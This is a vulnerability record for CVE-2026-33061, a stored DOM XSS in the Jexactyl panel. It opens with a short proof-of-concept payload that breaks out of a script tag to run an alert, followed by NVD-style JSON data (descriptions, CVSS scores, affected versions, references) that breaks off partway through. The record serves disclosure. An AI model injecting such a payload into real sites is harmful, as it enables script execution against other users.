CVE-2026-33061

// Payload to inject into a user-controlled field (e.g., username or display name) // The application uses {!! json_encode($user) !!} in wrapper.blade.php // This payload breaks out of the JSON string context in the browser. const maliciousUsername = "</script><script>alert('CVE-2026-33061 XSS');</script>"; // Explanation: // 1. The attacker sets their display name to the string above. // 2. The server stores it in the database. // 3. When the page renders, the output becomes: var user = {"name": "</script><script>alert('CVE-2026-33061 XSS');</script>"}; // 4. The browser sees the closing </script> tag, ends the current script block, // and immediately executes the new script block containing the alert.

{"cve": {"id": "CVE-2026-33061", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:12.090", "lastModified": "2026-04-14T17:56:38.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jexactyl is a customisable game management panel and billing system. Commits after 025e8dbb0daaa04054276bda814d922cf4af58da and before e28edb204e80efab628d1241198ea4f079779cfd inject server-side objects into client-side JavaScript through resources/views/templates/wrapper.blade.php. Using unescaped {!! json_encode(...) !!} without safe encoding flags allows string values to break out of the JavaScript context and be interpreted as HTML/JS by the browser. If any serialized fields contain attacker-controlled content, such as a username, display name, or site config value, a malicious payload will execute arbitrary script for any user viewing the page (stored DOM XSS). This issue has been patched by commit e28edb204e80efab628d1241198ea4f079779cfd."}, {"lang": "es", "value": "exactyl es un panel de gestión de juegos y sistema de facturación personalizable. Commits después de 025e8dbb0daaa04054276bda814d922cf4af58da y antes de e28edb204e80efab628d1241198ea4f079779cfd inyectan objetos del lado del servidor en JavaScript del lado del cliente a través de resources/views/templates/wrapper.blade.php. Usar {!! json_encode(...) !!} sin escapar y sin banderas de codificación segura permite que los valores de cadena salgan del contexto de JavaScript y sean interpretados como HTML/JS por el navegador. Si algún campo serializado contiene contenido controlado por el atacante, como un nombre de usuario, nombre de visualización o valor de configuración del sitio, una carga útil maliciosa ejecutará un script arbitrario para cualquier usuario que vea la página (XSS DOM almacenado). Este problema ha sido parcheado por el commit e28edb204e80efab628d1241198ea4f079779cfd."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.8.0", "matchCriteriaId": "6C552E32-4BAD-440D-B29A-B2E02246AE20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "08A85D83-EB57-4B0B-B35F-0CCAAA46E973"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7916B5CF-2EB4-46CC-A1B9-A2923509D81D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "3F082307-4A99-4365-9931-9D8948C998D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "7373C273-098A-41E1-A8A8-CAB1358B828A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "3967F8B9-EFB8-4B74-AF96-DDE4D81D91BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "E1EFCCD5-7C2A-478D-A484-81007FE6FB19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "887913CA-22D9-489C-8B13-3D52CA759405"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "E4878F19-2FBC-4230-A944-9F87B31B1C96"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "C3A132E3-C73F-4783-AA85-A1222BA437BF"}]}]}], "references": [{"url": "https://github.com/Jexactyl/Jexactyl/commit/e28edb204e80efab628d1241198ea4f079779cfd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Jexactyl/Jexactyl/security/advisories/GHSA-6xgw-mmmv-57h2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/J ... (truncated)